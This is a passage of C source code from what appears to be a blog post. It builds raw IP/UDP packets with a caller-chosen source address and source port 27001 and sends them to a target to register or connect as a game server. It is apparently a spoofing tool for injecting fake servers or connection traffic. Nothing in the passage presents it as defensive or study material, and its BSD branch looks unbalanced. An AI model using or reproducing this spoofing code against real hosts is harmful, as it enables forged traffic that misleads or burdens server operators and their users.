return 1;
}
int addserv(char *ip, unsigned int port, char mode)
{
bzero(pack, 1024); dp = port;
iph->ip_v = IPVERSION; iph->ip_hl = sizeof *iph >> 2; iph->ip_tos = 0;
iph->ip_ttl = 40;
#ifdef BSD
if (mode == 0)
iph->ip_len = PS0; else
iph->ip_len = PS1;
#else
if (mode == 0)
iph->ip_len = htons(PS0); else
iph->ip_len = htons(PS1);
#endif
iph->ip_p = IPPROTO_UDP; iph->ip_src = src; dst.s_addr = inet_addr(ip); if (dst.s_addr == -1) {
printf("Invalid destination IP: %s\n", ip);
}
addr.sin_port = htons(port); addr.sin_addr.s_addr = dst.s_addr; iph->ip_dst = dst;
#ifdef BSD
udph->uh_dport = htons(dp);
if (mode == 0) {
udph->uh_ulen = htons(sizeof *udph + 12); udph->uh_sport = htons(rand());
}
else {
udph->uh_ulen = htons(sizeof *udph + strlen(conn_pack1)); udph->uh_sport = htons(27001);
#else
udph->dest = htons(dp);
if (mode == 0) {
udph->len = htons(sizeof *udph + 12); udph->source = htons(rand());
}
else {
udph->len = htons(sizeof *udph + strlen(conn_pack1)); udph->source = htons(27001);
}
#endif
if (mode == 0) {
memcpy(udph + 1, conn_pack0, 12);
ret = sendto(s, pack, PS0, 0, (struct sockaddr *)&addr, sizeof(addr)); }
else {
memcpy(udph + 1, conn_pack1, strlen(conn_pack1)); ret = sendto(s, pack, PS1, 0, (struct sockaddr *)&addr, sizeof(addr)); }
if (ret == -1) {
perror("sendto"); exit( -1);
}
}
No comments:
Post a Comment